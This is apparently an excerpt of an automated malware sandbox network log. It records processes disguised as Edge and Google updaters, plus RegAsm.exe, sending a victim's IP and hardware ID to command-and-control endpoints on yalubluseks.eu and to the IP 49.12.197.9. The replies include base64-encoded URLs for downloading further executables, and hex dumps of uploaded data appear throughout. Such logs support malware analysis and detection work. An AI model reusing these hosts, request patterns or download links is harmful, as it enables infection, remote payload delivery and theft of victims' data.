                                                                                                                                                                                                                                          2024-10-02 12:43:55 UTC16355OUTData Raw: 63 5a 77 38 74 75 79 67 6d 4c 31 4c 4c 49 55 54 4a 35 41 63 2b 6c 56 37 43 4c 55 64 4c 67 56 4e 4f 61 31 67 6a 6a 6b 4d 73 4d 45 73 43 33 43 77 4d 54 6b 2b 57 5a 51 37 4c 7a 6a 6f 65 63 56 47 39 68 50 50 4c 64 53 42 49 72 58 37 59 70 57 34 53 4d 73 36 79 41 73 48 50 4d 6a 4d 32 53 79 67 39 61 58 31 58 46 74 65 65 75 74 2b 76 54 37 68 2f 58 63 43 6d 39 6e 48 54 53 33 54 72 62 31 33 2f 34 59 6e 73 62 77 7a 57 71 7a 33 44 52 4a 4c 4b 53 37 4b 70 41 41 7a 7a 67 44 73 50 61 72 69 73 72 44 4b 73 43 50 59 31 6e 79 57 32 70 6d 41 57 30 56 36 69 57 34 74 7a 62 42 50 4c 48 2b 72 4c 37 79 4d 34 2f 76 44 4f 65 74 58 59 7a 63 76 4c 4c 50 65 54 43 61 34 6d 62 66 49 34 55 4c 6b 2f 51 63 56 36 39 46 31 46 37 73 6f 36 4c 72 63 38 4c 45 52 6f 74 4f 63 5a 58 62 36 57 48 50
                                                                                                                                                                                                                                          Data Ascii: cZw8tuygmL1LLIUTJ5Ac+lV7CLUdLgVNOa1gjjkMsMEsC3CwMTk+WZQ7LzjoecVG9hPPLdSBIrX7YpW4SMs6yAsHPMjM2Syg9aX1XFteeut+vT7h/XcCm9nHTS3Trb13/4YnsbwzWqz3DRJLKS7KpAAzzgDsParisrDKsCPY1nyW2pmAW0V6iW4tzbBPLH+rL7yM4/vDOetXYzcvLLPeTCa4mbfI4ULk/QcV69F1F7so6Lrc8LERotOcZXb6WHP
                                                                                                                                                                                                                                          2024-10-02 12:43:55 UTC16355OUTData Raw: 69 6d 4d 4d 6b 59 45 53 71 6d 2f 63 4d 59 50 34 34 70 74 78 70 54 6d 79 59 4c 4a 4e 4c 4f 35 69 58 63 37 4b 43 71 71 34 4f 42 67 41 63 63 6e 31 2b 74 41 43 33 46 39 4a 63 4e 42 44 45 5a 37 53 51 33 41 69 6c 42 56 43 77 47 77 74 78 39 34 63 38 55 35 64 51 65 7a 69 75 68 64 4d 5a 76 73 38 6f 55 53 5a 52 43 79 6b 41 6a 4f 34 68 63 38 34 34 78 39 4b 6b 62 53 6b 5a 51 66 74 56 78 35 77 6c 38 30 7a 66 4a 75 4a 32 37 66 37 75 4d 59 39 71 63 32 6c 78 6c 45 32 7a 54 4c 4b 73 68 6c 4d 77 49 4c 4d 78 47 43 54 6b 45 64 44 6a 70 78 32 78 51 42 46 62 36 73 31 7a 65 46 59 37 64 7a 62 6d 33 57 5a 58 2b 55 64 63 39 66 6d 39 73 66 58 50 62 6d 6b 67 31 56 4c 74 6f 35 6f 53 52 43 73 6e 6b 79 71 53 72 59 4a 41 32 6e 4b 6b 6a 72 67 63 48 76 37 55 2f 38 41 73 61 44 79 2f 4c 45
                                                                                                                                                                                                                                          Data Ascii: imMMkYESqm/cMYP44ptxpTmyYLJNLO5iXc7KCqq4OBgAccn1+tAC3F9JcNBDEZ7SQ3AilBVCwGwtx94c8U5dQeziuhdMZvs8oUSZRCykAjO4hc844x9KkbSkZQftVx5wl80zfJuJ27f7uMY9qc2lxlE2zTLKshlMwILMxGCTkEdDjpx2xQBFb6s1zeFY7dzbm3WZX+Udc9fm9sfXPbmkg1VLto5oSRCsnkyqSrYJA2nKkjrgcHv7U/8AsaDy/LE
                                                                                                                                                                                                                                          2024-10-02 12:43:55 UTC16355OUTData Raw: 31 71 44 41 75 49 43 4f 68 54 6a 35 66 77 78 56 32 69 67 43 4d 57 38 41 75 57 75 52 44 47 4a 32 51 52 74 4b 46 47 34 71 43 53 41 54 31 77 43 54 78 37 6d 70 4b 4b 4b 41 43 69 69 69 67 41 72 6c 76 69 4c 2f 79 49 57 70 2f 53 50 38 41 39 47 4c 58 55 31 79 33 78 46 2f 35 45 4c 55 2f 70 48 2f 36 4d 57 72 70 66 47 76 55 7a 71 2f 77 35 65 68 34 37 59 66 36 73 56 70 4c 30 72 4e 73 50 39 57 4b 30 56 36 56 39 72 53 2b 45 2b 49 71 2f 45 50 6f 70 4b 4b 30 4d 68 52 53 47 6b 6f 6f 73 41 79 36 2f 77 43 51 64 63 66 38 42 2f 6e 56 54 54 54 2b 39 6c 2f 33 61 74 58 58 2f 49 50 75 66 6f 76 2f 41 4b 45 4b 70 36 5a 2f 72 5a 50 39 33 2b 74 4f 50 77 73 52 70 5a 6f 36 6d 6b 7a 78 52 53 41 57 6c 42 70 4b 4b 41 44 4e 4f 42 34 70 74 41 70 41 4f 7a 53 35 78 54 63 30 6d 61 56 67 73 53
                                                                                                                                                                                                                                          Data Ascii: 1qDAuICOhTj5fwxV2igCMW8AuWuRDGJ2QRtKFG4qCSAT1wCTx7mpKKKACiiigArlviL/yIWp/SP8A9GLXU1y3xF/5ELU/pH/6MWrpfGvUzq/w5eh47Yf6sVpL0rNsP9WK0V6V9rS+E+Iq/EPopKK0MhRSGkoosAy6/wCQdcf8B/nVTTT+9l/3atXX/IPufov/AKEKp6Z/rZP93+tOPwsRpZo6mkzxRSAWlBpKKADNOB4ptApAOzS5xTc0maVgsS
                                                                                                                                                                                                                                          2024-10-02 12:43:55 UTC16355OUTData Raw: 46 4e 4e 41 45 64 78 2f 78 35 33 48 2f 58 50 2b 6f 72 50 30 7a 2f 41 46 37 2f 41 4f 35 57 68 63 35 46 6c 63 66 37 6e 39 52 57 66 70 6e 2b 76 66 38 41 33 4b 63 66 68 59 49 31 4b 57 6a 46 41 46 49 41 78 53 55 37 46 47 4b 51 72 6a 63 55 75 4b 63 42 53 34 2f 7a 6d 69 34 58 47 59 6f 70 2b 4b 41 70 6f 75 4b 34 30 43 6a 46 50 43 6e 30 70 77 6a 62 30 70 58 43 35 46 69 6c 78 55 76 6c 34 36 6b 43 6d 6e 59 4f 73 67 70 63 77 72 6a 63 55 62 61 58 7a 49 68 33 4a 2b 67 6f 4d 36 44 70 47 54 39 54 52 64 6a 75 32 47 32 6c 43 55 30 33 44 64 6c 55 55 30 7a 53 48 71 32 50 70 52 61 51 57 6b 54 43 4d 2b 68 70 64 6d 4f 75 42 2b 4e 56 69 37 48 71 78 2f 4f 6d 35 6f 35 57 48 49 79 31 38 69 39 5a 46 71 78 61 4d 68 6c 59 4b 53 63 78 76 32 39 71 7a 63 31 62 73 44 2f 70 42 7a 30 38 74
                                                                                                                                                                                                                                          Data Ascii: FNNAEdx/x53H/XP+orP0z/AF7/AO5Whc5Flcf7n9RWfpn+vf8A3KcfhYI1KWjFAFIAxSU7FGKQrjcUuKcBS4/zmi4XGYop+KApouK40CjFPCn0pwjb0pXC5FilxUvl46kCmnYOsgpcwrjcUbaXzIh3J+goM6DpGT9TRdju2G2lCU03DdlUU0zSHq2PpRaQWkTCM+hpdmOuB+NVi7Hqx/Om5o5WHIy18i9ZFqxaMhlYKScxv29qzc1bsD/pBz08t
                                                                                                                                                                                                                                          2024-10-02 12:43:55 UTC16355OUTData Raw: 69 69 75 77 38 30 4b 51 30 74 4a 51 41 55 55 55 55 41 46 46 46 46 41 42 52 52 52 51 4d 4b 53 69 6c 34 6f 41 53 69 69 69 67 42 4b 4b 4b 4b 41 43 6a 74 52 52 51 41 6c 46 46 46 41 77 70 4f 61 4f 39 46 4d 41 6f 6f 6f 6f 41 4b 4b 44 53 55 44 43 69 69 69 67 41 70 4b 4b 4b 41 43 69 69 67 30 44 41 30 6c 46 46 41 42 52 53 55 55 44 43 69 69 6b 6f 47 46 4a 53 30 6c 41 42 52 52 52 51 4d 53 69 6c 70 44 51 41 55 55 55 55 44 45 6f 6f 6f 70 67 4a 52 52 52 51 4d 51 55 55 63 30 55 41 46 4a 53 30 55 41 4a 52 52 52 51 4d 54 76 51 61 4b 53 67 59 55 6c 4c 53 55 44 43 6b 70 61 53 67 41 70 4b 57 6b 6f 47 46 42 6f 70 4b 42 68 52 52 53 47 67 41 6f 4a 6f 70 4b 59 77 6f 6f 70 4b 42 68 53 55 74 4e 4a 6f 42 42 52 52 53 47 67 59 74 4a 6d 69 6b 2b 74 4d 59 5a 6f 70 43 77 70 75 36 6d 4f
                                                                                                                                                                                                                                          Data Ascii: iiuw80KQ0tJQAUUUUAFFFFABRRRQMKSil4oASiiigBKKKKACjtRRQAlFFFAwpOaO9FMAooooAKKDSUDCiiigApKKKACiig0DA0lFFABRSUUDCiikoGFJS0lABRRRQMSilpDQAUUUUDEooopgJRRRQMQUUc0UAFJS0UAJRRRQMTvQaKSgYUlLSUDCkpaSgApKWkoGFBopKBhRRSGgAoJopKYwoopKBhSUtNJoBBRRSGgYtJmik+tMYZopCwpu6mO
                                                                                                                                                                                                                                          2024-10-02 12:43:55 UTC16355OUTData Raw: 45 4d 50 6d 77 47 41 48 51 74 54 59 39 65 76 70 74 52 65 34 76 4c 59 57 58 39 6c 33 69 32 4e 35 46 48 64 6d 57 4b 52 5a 6b 6a 59 53 44 35 56 2b 36 7a 4a 67 6b 41 67 62 75 6d 63 55 65 30 6c 65 32 6e 33 4c 2b 75 6f 76 5a 78 74 31 2b 39 2f 35 6d 37 35 47 76 66 38 41 51 53 30 33 2f 77 41 46 37 2f 38 41 78 36 6a 79 4e 65 2f 36 43 57 6d 2f 2b 43 39 2f 2f 6a 31 63 76 42 72 6b 2b 6b 2b 4f 50 45 45 32 6f 58 6b 68 30 67 79 72 43 71 79 4f 53 74 75 36 57 30 63 6f 32 6a 73 47 42 6b 4a 78 33 55 64 7a 56 50 51 4e 57 76 37 66 56 4a 78 72 4c 33 63 30 31 78 72 53 71 6b 62 58 4c 71 74 6f 48 73 2f 4f 32 62 52 77 79 72 79 75 30 38 45 2f 4e 31 6f 56 52 76 74 74 66 5a 66 35 44 39 69 76 50 37 33 2f 41 4a 6e 61 65 52 72 33 2f 51 53 30 33 2f 77 58 76 2f 38 41 48 71 50 49 31 37 2f
                                                                                                                                                                                                                                          Data Ascii: EMPmwGAHQtTY9evptRe4vLYWX9l3i2N5FHdmWKRZkjYSD5V+6zJgkAgbumcUe0le2n3L+uovZxt1+9/5m75Gvf8AQS03/wAF7/8Ax6jyNe/6CWm/+C9//j1cvBrk+k+OPEE2oXkh0gyrCqyOStu6W0co2jsGBkJx3UdzVPQNWv7fVJxrL3c01xrSqkbXLqtoHs/O2bRwyryu08E/N1oVRvttfZf5D9ivP73/AJnaeRr3/QS03/wXv/8AHqPI17/
                                                                                                                                                                                                                                          2024-10-02 12:43:55 UTC8801OUTData Raw: 2f 65 2f 44 2f 41 49 4a 36 46 52 58 6e 74 46 50 2b 31 2f 37 6e 34 2f 38 41 41 48 2f 5a 76 39 37 38 50 2b 43 65 67 6d 69 76 50 71 4b 50 37 58 2f 75 66 6a 2f 77 41 2f 73 33 2b 39 2b 48 2f 42 50 51 4b 44 58 41 41 45 6b 41 41 6b 6e 67 41 56 72 79 2b 45 76 45 6b 45 73 55 55 33 68 37 56 59 35 4a 73 2b 55 72 32 55 67 4c 34 47 54 74 42 48 4f 42 7a 78 32 70 66 32 78 2f 63 2f 48 2f 41 49 41 31 6c 76 38 41 65 2f 44 2f 41 49 4a 30 35 2f 38 41 31 55 56 77 71 32 74 77 39 72 4a 64 4a 42 4b 31 76 45 77 57 53 55 49 53 69 45 35 77 43 65 67 4a 77 63 66 51 31 62 76 4e 42 31 6a 54 72 4b 4b 38 76 74 4a 76 72 61 31 6c 77 49 35 35 37 64 30 52 38 6a 49 77 78 47 44 6b 63 30 66 32 76 2f 63 2f 48 2f 67 44 2f 73 37 2b 39 2b 48 2f 41 41 54 72 61 44 58 42 55 55 2f 37 58 2f 75 66 6a 2f
                                                                                                                                                                                                                                          Data Ascii: /e/D/AIJ6FRXntFP+1/7n4/8AAH/Zv978P+CegmivPqKP7X/ufj/wA/s3+9+H/BPQKDXAAEkAAkngAVry+EvEkEsUU3h7VY5Js+Ur2UgL4GTtBHOBzx2pf2x/c/H/AIA1lv8Ae/D/AIJ05/8A1UVwq2tw9rJdJBK1vEwWSUISiE5wCegJwcfQ1bvNB1jTrKK8vtJvra1lwI557d0R8jIwxGDkc0f2v/c/H/gD/s7+9+H/AATraDXBUU/7X/ufj/
                                                                                                                                                                                                                                          2024-10-02 12:43:57 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                          Date: Wed, 02 Oct 2024 12:43:57 GMT
                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                          2024-10-02 12:43:57 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                          Data Ascii: 2ok0


                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                          43192.168.2.658562172.67.140.924434340C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                          2024-10-02 12:43:56 UTC143OUTPOST /receive.php HTTP/1.1
                                                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                          Host: yalubluseks.eu
                                                                                                                                                                                                                                          Content-Length: 84
                                                                                                                                                                                                                                          Expect: 100-continue
                                                                                                                                                                                                                                          2024-10-02 12:43:56 UTC25INHTTP/1.1 100 Continue
                                                                                                                                                                                                                                          2024-10-02 12:43:56 UTC84OUTData Raw: 69 70 3d 38 2e 34 36 2e 31 32 33 2e 33 33 26 68 77 69 64 3d 64 31 65 62 37 39 63 63 61 63 65 32 65 32 62 31 34 34 33 35 64 64 65 30 35 39 63 64 32 61 63 35 65 62 32 39 37 39 38 33 65 35 35 64 64 63 61 65 62 61 32 37 63 62 37 63 36 65 35 61 66 36 64 63
                                                                                                                                                                                                                                          Data Ascii: ip=8.46.123.33&hwid=d1eb79ccace2e2b14435dde059cd2ac5eb297983e55ddcaeba27cb7c6e5af6dc
                                                                                                                                                                                                                                          2024-10-02 12:43:56 UTC615INHTTP/1.1 200 OK
                                                                                                                                                                                                                                          Date: Wed, 02 Oct 2024 12:43:56 GMT
                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=s32yS7JoTvt4HwqhskM%2BVPiGROFEh6Mm%2F69%2BX3htmvamcyx7FUCPwPmeEnYNADFvDlJzBvslaqXs%2Fc8BPxvhKIEJnuNwPUIq%2FO8Y5f583DR%2BqA18jYieSPMhRBj%2F8g5nFg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                          CF-RAY: 8cc4c7ed4e8c4315-EWR
                                                                                                                                                                                                                                          0


                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                          44192.168.2.658564172.67.140.924434340C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                          2024-10-02 12:43:57 UTC144OUTPOST /get_file.php HTTP/1.1
                                                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                          Host: yalubluseks.eu
                                                                                                                                                                                                                                          Content-Length: 84
                                                                                                                                                                                                                                          Expect: 100-continue
                                                                                                                                                                                                                                          2024-10-02 12:43:57 UTC25INHTTP/1.1 100 Continue
                                                                                                                                                                                                                                          2024-10-02 12:43:57 UTC84OUTData Raw: 68 77 69 64 3d 64 31 65 62 37 39 63 63 61 63 65 32 65 32 62 31 34 34 33 35 64 64 65 30 35 39 63 64 32 61 63 35 65 62 32 39 37 39 38 33 65 35 35 64 64 63 61 65 62 61 32 37 63 62 37 63 36 65 35 61 66 36 64 63 26 69 70 3d 38 2e 34 36 2e 31 32 33 2e 33 33
                                                                                                                                                                                                                                          Data Ascii: hwid=d1eb79ccace2e2b14435dde059cd2ac5eb297983e55ddcaeba27cb7c6e5af6dc&ip=8.46.123.33
                                                                                                                                                                                                                                          2024-10-02 12:43:58 UTC605INHTTP/1.1 200 OK
                                                                                                                                                                                                                                          Date: Wed, 02 Oct 2024 12:43:58 GMT
                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yYaQJ7OVURNAL7HWhrP8fdQGoQQuefsvsMSLrFAoFMFHyt5IJPVzrVATyTK26y1lU5mgOFzn%2F1v6XtxNgFcv8tVxH6B%2BGb2Jmlvn5wQDKam6Ky7Y7Pvjucv8JJG9M0Hbiw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                          CF-RAY: 8cc4c7f68cf272ab-EWR
                                                                                                                                                                                                                                          0


                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                          45192.168.2.65856549.12.197.94436208C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                          2024-10-02 12:43:58 UTC276OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----CFHDHIJDGCBAKFIEGHCB
                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                                                                                                                                          Host: 49.12.197.9
                                                                                                                                                                                                                                          Content-Length: 331
                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                          2024-10-02 12:43:58 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 43 46 48 44 48 49 4a 44 47 43 42 41 4b 46 49 45 47 48 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 62 34 65 64 66 38 31 36 61 64 33 66 33 63 65 61 39 39 36 65 35 61 61 39 62 33 30 31 63 61 30 0d 0a 2d 2d 2d 2d 2d 2d 43 46 48 44 48 49 4a 44 47 43 42 41 4b 46 49 45 47 48 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 38 62 34 64 34 37 35 38 36 38 37 34 62 30 38 39 34 37 32 30 33 66 30 33 65 34 64 62 33 39 36 32 0d 0a 2d 2d 2d 2d 2d 2d 43 46 48 44 48 49 4a 44 47 43 42 41 4b 46 49 45 47 48 43 42 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                          Data Ascii: ------CFHDHIJDGCBAKFIEGHCBContent-Disposition: form-data; name="token"3b4edf816ad3f3cea996e5aa9b301ca0------CFHDHIJDGCBAKFIEGHCBContent-Disposition: form-data; name="build_id"8b4d47586874b08947203f03e4db3962------CFHDHIJDGCBAKFIEGHCBCont
                                                                                                                                                                                                                                          2024-10-02 12:43:59 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                          Date: Wed, 02 Oct 2024 12:43:58 GMT
                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                          2024-10-02 12:43:59 UTC276INData Raw: 31 30 38 0d 0a 4d 54 49 32 4e 44 67 78 4e 58 78 6f 64 48 52 77 4f 69 38 76 4d 54 51 33 4c 6a 51 31 4c 6a 51 30 4c 6a 45 77 4e 43 39 73 5a 47 31 7a 4c 7a 59 32 5a 6d 4a 6d 59 32 4d 35 4f 54 59 7a 59 32 46 66 62 47 52 6d 63 32 35 68 4c 6d 56 34 5a 58 77 78 66 47 74 72 61 32 74 38 4d 54 49 32 4e 44 67 78 4e 6e 78 6f 64 48 52 77 4f 69 38 76 4d 54 51 33 4c 6a 51 31 4c 6a 51 30 4c 6a 45 77 4e 43 39 73 5a 47 31 7a 4c 7a 59 32 5a 6d 4a 6d 59 32 4e 6b 4f 44 4d 33 59 57 4e 66 64 6d 46 6b 5a 32 64 6b 63 32 45 75 5a 58 68 6c 66 44 46 38 61 32 74 72 61 33 77 78 4d 6a 59 30 4f 44 45 33 66 47 68 30 64 48 41 36 4c 79 38 78 4e 44 63 75 4e 44 55 75 4e 44 51 75 4d 54 41 30 4c 33 42 79 62 32 63 76 4e 6a 5a 6d 59 6d 5a 6a 59 7a 4d 77 4d 57 45 7a 4d 56 39 7a 64 33 64 7a 4c 6d
                                                                                                                                                                                                                                          Data Ascii: 108MTI2NDgxNXxodHRwOi8vMTQ3LjQ1LjQ0LjEwNC9sZG1zLzY2ZmJmY2M5OTYzY2FfbGRmc25hLmV4ZXwxfGtra2t8MTI2NDgxNnxodHRwOi8vMTQ3LjQ1LjQ0LjEwNC9sZG1zLzY2ZmJmY2NkODM3YWNfdmFkZ2dkc2EuZXhlfDF8a2tra3wxMjY0ODE3fGh0dHA6Ly8xNDcuNDUuNDQuMTA0L3Byb2cvNjZmYmZjYzMwMWEzMV9zd3dzLm


                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                          46192.168.2.658566172.67.140.924436320C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe
                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                          2024-10-02 12:43:58 UTC143OUTPOST /receive.php HTTP/1.1
                                                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                          Host: yalubluseks.eu
                                                                                                                                                                                                                                          Content-Length: 84
                                                                                                                                                                                                                                          Expect: 100-continue
                                                                                                                                                                                                                                          2024-10-02 12:43:58 UTC25INHTTP/1.1 100 Continue
                                                                                                                                                                                                                                          2024-10-02 12:43:58 UTC84OUTData Raw: 69 70 3d 38 2e 34 36 2e 31 32 33 2e 33 33 26 68 77 69 64 3d 64 31 65 62 37 39 63 63 61 63 65 32 65 32 62 31 34 34 33 35 64 64 65 30 35 39 63 64 32 61 63 35 65 62 32 39 37 39 38 33 65 35 35 64 64 63 61 65 62 61 32 37 63 62 37 63 36 65 35 61 66 36 64 63
                                                                                                                                                                                                                                          Data Ascii: ip=8.46.123.33&hwid=d1eb79ccace2e2b14435dde059cd2ac5eb297983e55ddcaeba27cb7c6e5af6dc
                                                                                                                                                                                                                                          2024-10-02 12:43:59 UTC609INHTTP/1.1 200 OK
                                                                                                                                                                                                                                          Date: Wed, 02 Oct 2024 12:43:59 GMT
                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QaLcSetmGYsexOPTIVnMkJJTRLRLJi5pUEx%2F5pbfvxWhEU%2Bq4cpooLnqGTMiHaV13qetx9rB5LxA8X%2Bsn5y0ISBMOfCMSqzzLU1y6IqaSRae4oO8UV8bOgcLQ8YQ8%2FiMZw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                          CF-RAY: 8cc4c7fc9fb942e5-EWR
                                                                                                                                                                                                                                          0


                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                          47192.168.2.658567172.67.140.924434340C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                          2024-10-02 12:43:58 UTC146OUTPOST /get_update.php HTTP/1.1
                                                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                          Host: yalubluseks.eu
                                                                                                                                                                                                                                          Content-Length: 19
                                                                                                                                                                                                                                          Expect: 100-continue
                                                                                                                                                                                                                                          2024-10-02 12:43:58 UTC25INHTTP/1.1 100 Continue
                                                                                                                                                                                                                                          2024-10-02 12:43:58 UTC19OUTData Raw: 63 75 72 72 65 6e 74 5f 76 65 72 73 69 6f 6e 3d 30 2e 33
                                                                                                                                                                                                                                          Data Ascii: current_version=0.3
                                                                                                                                                                                                                                          2024-10-02 12:43:59 UTC605INHTTP/1.1 200 OK
                                                                                                                                                                                                                                          Date: Wed, 02 Oct 2024 12:43:59 GMT
                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Bf8fLj03rFlpWMwjAtlKvhpHTDk3cs7R2TQ%2FxoDxAejeFrvsoy0IaBqMgEEnOM2npCkLCi3IRqsGiAaqwuIAqNlbMhxAlztIuSdqRZrdCZoDrbMWa0a4wyk3tQ%2FSmkWVMg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                          CF-RAY: 8cc4c7fc9f6a7ce4-EWR
                                                                                                                                                                                                                                          0


                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                          48192.168.2.658569172.67.140.924436320C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe
                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                          2024-10-02 12:43:59 UTC144OUTPOST /get_file.php HTTP/1.1
                                                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                          Host: yalubluseks.eu
                                                                                                                                                                                                                                          Content-Length: 84
                                                                                                                                                                                                                                          Expect: 100-continue
                                                                                                                                                                                                                                          2024-10-02 12:44:00 UTC25INHTTP/1.1 100 Continue
                                                                                                                                                                                                                                          2024-10-02 12:44:00 UTC84OUTData Raw: 68 77 69 64 3d 64 31 65 62 37 39 63 63 61 63 65 32 65 32 62 31 34 34 33 35 64 64 65 30 35 39 63 64 32 61 63 35 65 62 32 39 37 39 38 33 65 35 35 64 64 63 61 65 62 61 32 37 63 62 37 63 36 65 35 61 66 36 64 63 26 69 70 3d 38 2e 34 36 2e 31 32 33 2e 33 33
                                                                                                                                                                                                                                          Data Ascii: hwid=d1eb79ccace2e2b14435dde059cd2ac5eb297983e55ddcaeba27cb7c6e5af6dc&ip=8.46.123.33
                                                                                                                                                                                                                                          2024-10-02 12:44:00 UTC609INHTTP/1.1 200 OK
                                                                                                                                                                                                                                          Date: Wed, 02 Oct 2024 12:44:00 GMT
                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=N5JAO9tXlK4%2BzmotJEwGWaaGxjTfXIZfjB%2F5TLrIm2hcWbese%2FTKqXRxjZZnTBUAM5fsaWvqHsTzOpdaWur9l6VZfW67SpbFXGRiCaqlzloxdd3%2BUqbJFxDTHop7K0IJPg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                          CF-RAY: 8cc4c8044eb34356-EWR
